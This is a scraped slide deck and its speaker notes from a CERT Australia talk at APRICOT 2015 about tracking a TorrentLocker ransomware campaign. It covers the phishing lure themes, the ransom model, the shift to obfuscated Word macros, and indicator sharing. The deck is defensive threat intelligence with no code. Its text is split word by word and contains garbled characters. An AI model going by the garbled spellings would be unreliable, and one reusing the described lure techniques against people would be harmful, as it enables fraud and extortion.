A Good Girl's Guide to Murder (A Good Girl's Guide to Murder, #1)
Tracking cyber kidnappers by Andrew Clark [APRICOT 2015]
1. Dr
Andrew
Clark
Senior
Technical
Advisor,
CERT
Australia
Tracking
cyber
kidnappers
APRICOT
2015,
Fukuoka
APCERT
Security
Track
data
2. Tracking
cyber
kidnappers
data
Presenta2on
overview
• About
CERT
Australia
• Ransomware
campaign
targeGng
Australia
– CharacterisGcs
– Response
– Analysis
• Related
campaigns
• Conclusion
2
APRICOT
2015
–
Fukuoka
-‐
APCERT
Security
Track
3. Tracking
cyber
kidnappers
data
• Provides
major
Australian
businesses
with
informaGon
about
cyber
threats
and
support
in
responding
to
cyber
security
incidents
• Focus
on
systems
of
naGonal
interest,
including
criGcal
infrastructure
About
CERT
Australia
3
APRICOT
2015
–
Fukuoka
-‐
APCERT
Security
Track
4. Tracking
cyber
kidnappers
data
• Trusted
source
of
informaGon
for
partners
(over
500
Australian
businesses)
• ParGcipant
in
a
global
network
of
naGonal
CERTs,
including
APCERT
About
CERT
Australia
4
APRICOT
2015
–
Fukuoka
-‐
APCERT
Security
Track
5. Tracking
cyber
kidnappers
data
CERT
Australia
services
APRICOT
2015
–
Fukuoka
-‐
APCERT
Security
Track
5
Proac2ve
Reac2ve
Publica2ons
v Advisories
v Good
pracGce
guides
v Protect
products
Informa2on
exchanges
v Regional
v NaGonal
Training
and
Exercises
v ICS
/
domesGc
training
v Eg.
Cyber
Storm
v Regional
exercises
v Custom
exercises
Assistance
/
support
to
v ACSC
agency
partners
v Hotline
Ac2vi2es
v Onsite
assistance
(e.g.
major
ISPs,
technology
companies)
v CND
advice
v Offsite
malware,
log
and
other
analysis
6. Tracking
cyber
kidnappers
data
Background
• In
late
2013,
CERT
Australia
began
tracking
an
internaGonal
ransomware
campaign
targeGng
Australia
• The
aWack
was
prolonged
– persisGng
throughout
2014
(and
into
2015)
– affected
a
large
range
of
partners,
across
all
sectors
• The
email
lures
used
localised
themes
• The
infrastructure
shiYed
rapidly
to
confound
detecGon
APRICOT
2015
–
Fukuoka
-‐
APCERT
Security
Track
6
7. Tracking
cyber
kidnappers
data
Background
–
targe2ng*
APRICOT
2015
–
Fukuoka
-‐
APCERT
Security
Track
7
*
Source:
“TorrentLocker:
Ransomware
in
a
country
near
you”,
M-‐E.M.
Léveillé,
December
2014.
8. Tracking
cyber
kidnappers
data
The
‘business’
model
(a.k.a.
TorrentLocker)
1. Send
themed
spam
containing
website
link
to
vicGm
(official
looking
domain
names,
e.g.
aus-‐post.info)
2. VicGm
visits
website
and
downloads
‘bill’
or
‘viewer’
(malware)
and
runs
it
3. Malware
encrypts
files
(including
those
on
network
shares)
and
asks
for
ransom
to
decrypt
them
4. VicGm
pays
ransom
(BitCoins)
via
TOR-‐protected
site
5. VicGm
downloads
decrypGon
program
to
decrypt
files
APRICOT
2015
–
Fukuoka
-‐
APCERT
Security
Track
8
9. Tracking
cyber
kidnappers
data
Campaign
characteris2cs
• Keep
‘consumers’
(vicGms)
confident
– Re-‐used
previous
campaign
branding
(CryptoLocker)
– Won’t
pay
if
they’re
not
going
to
get
their
files
back
• Constantly
evolving
– New
domains
registered
almost
daily
•
to
keep
ahead
of
takedowns
– Malware
binary
changed
almost
daily
• to
keep
ahead
of
anG-‐virus
updates
APRICOT
2015
–
Fukuoka
-‐
APCERT
Security
Track
9
25. Tracking
cyber
kidnappers
data
Analysis
–
indicator
sharing
• Express
indicators
in
STIX
format
• STIX:
Structured
Threat
InformaGon
eXpression
– highly
descripGve
• indicators,
observables,
TTPs,
CoA,
Kill
Chain
– machine
readable
• supported
by
growing
number
of
tools
– automated
sharing
via
TAXII
service
APRICOT
2015
–
Fukuoka
-‐
APCERT
Security
Track
25
26. Tracking
cyber
kidnappers
data
Analysis
-‐
links
to
other
campaigns
• Links
between
this
ransomware
campaign
and
banking
trojans
have
been
idenGfied
– Hesperbot
– Dridex
APRICOT
2015
–
Fukuoka
-‐
APCERT
Security
Track
26
28. Tracking
cyber
kidnappers
data
Analysis
–
Word
Macro
observa2ons
• As
before,
actors
are
conGnually
tweaking
techniques,
also
modernising
old
techniques
– Early
word
macro
code
>
URL’s
were
in
clear
text
– Newer
variants
are
increasingly
more
obfuscated
– Password
protected
macro’s
appearing
– SANDBOXES
having
some
trouble
scanning
these
files
– Advanced
variants
uGlizing
Powershell
– Latest
variant
using
embedded
EXE’s,
smaller
footprint
28
APRICOT
2015
–
Fukuoka
-‐
APCERT
Security
Track
29. Tracking
cyber
kidnappers
data
Australia
Post
Theme
Oct
2013
Hesperbot
Australia
Post
Theme
Nov
2013
CryptoLocker
Energy
Australia
Theme
May
2014
CryptoLocker
/CryptoWall
Telstra
Theme
Sep
2014
TorrentLocker
NSW-‐Gov
“RTA
Speeding
Fine”
Theme
Oct
2014
TorrentLocker
“Invoice”
Theme
.DOC
Macros
Oct
2014
Dridex
/
TorrentLocker
APRICOT
2015
–
Fukuoka
-‐
APCERT
Security
Track
29
30. Tracking
cyber
kidnappers
data
Conclusion
• Organised,
well
funded
and
VERY
persistent
• Prolific
-‐
affecGng
government,
individuals,
small
and
large
businesses
• MulGple
countries
targeted,
with
localised
themes
• Actors
are
nimble
and
conGnually
tweaking
techniques
– TorrentLocker
updated
within
a
week
to
patch
a
“XOR”
bug
allowing
decrypGon.
(September
2014)
– Phishing
websites
filtering
source
IP
address
via
country
– Freshly
compromised
WordPress
websites
used
in
phishing
emails
as
redirector
links,
complicaGng
detecGon
and
filtering
– ConGnual
wave
of
new
IP
addresses
used
to
host
phishing
sites.
Clean
reputaGon,
IP
addresses
mostly
not
seen
before.
APRICOT
2015
–
Fukuoka
-‐
APCERT
Security
Track
30
Notas do Editor
To track the activity, the CERT worked closely with Stay Smart Online and other ACSC agencies, including the Australian Federal Police and the Australian Crime Commission. In particular, when the actors shifted to a new delivery mechanism using malicious Microsoft Word documents containing macros, the CERT was able to quickly identify the change and pre-warn its partners.
The CERT facilitated and led the proactive defence effort by providing timely indicators of compromise to our partners, as well as assisting with infrastructure takedowns and victim recovery. This was accomplished through our own analysis and by leveraging our national and international partnerships. Throughout the campaign the CERT also provided its partners with longer term preventative strategies.
Notice the 22558 captcha is re-used across campaigns.
Notice the 22558 captcha is re-used across campaigns.
Notice the 22558 captcha is re-used across campaigns.
This Australia Post domain was also incorrectly configured by attackers with a UK Royal Mail splash page.
Application whitelisting of macro’s is becoming an important consideration
ANIMATED SLIDELinks exist between earlier Australia Post theme phishing emails distributing CryptoLocker/TorrentLocker and recent Word Documents
Early word documents distributing TorrentLocker are clearly also linked to newer variants distributing Dridex banking malware.
This was further shown when an Australia Post theme email containing a Word Document was first seen, late November 2014.
We conducted an in-depth investigation because attacks were so prolific, prolonged and involved.
Found rapidly changing lures, C2 infrastructure and implants – torrentlocker, cryptolocker, hesperbot, etc
CERT able to provide proactive information to our members of this kind of attack, due in part to what our international partner certs had been seeing.
Aspects of these campaigns:
- Shadow Volume copies
Ransom time limit
Bitcoin ransom in AUD
Domains also used to drop hesperbot and other trojans – usually banking
Reputational damage to large business
Worked with Stay Smart Online and CSOC / ACSC to provide readily available online advice and publicise these attacks to forewarn targets and assist those affected.